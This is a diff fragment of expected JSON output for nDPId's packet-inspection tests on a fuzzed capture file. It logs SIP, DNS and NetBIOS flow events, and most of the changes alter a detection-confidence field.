{"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469540839,"flow_last_seen":1120469733221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -202,52 +202,52 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572981,"flow_last_seen":1120469697469,"flow_idle_time":200000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2465,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572981,"flow_last_seen":1120469697469,"flow_idle_time":200000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2465,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1120469828958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469828958,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOah8AAIARTC7AqAHKwKgB\/wCJAIkAOluchP8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOa0JFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469830657} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469828958,"pkt":"ADBPADRWAODtAW69CABFAI1IaiAAAIARTTHAqAECwKgBAQqsADUANM1AXNgBAAABAAABgAAABF9zaXAEX3VkcANzMnAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1120469831652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469831652,"pkt":"ADBUADRWAODtAXq9CABFAABISiEAAIARTTDAqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469833655} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469831652,"pkt":"MDBUADRWAODtAW69CABFAABIaiIAE4ARTS\/AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1120469835658,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469835658,"pkt":"ADBUADRWAODtAW69CABFAABIaiMAAIARTS7AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469839664,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1120469839664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469839664,"pkt":"ADBUADRWAODtAW69CABFAABIaiQAAIARTS3AqAECwKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1120469847666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469847666,"pkt":"9jBUADRWAODtAW69CABFAABEaiUAAIARTTDAqAECwKhzAQqtADUAMFw5yNgAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycWEAAAwAAQ=="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arqa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arqa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 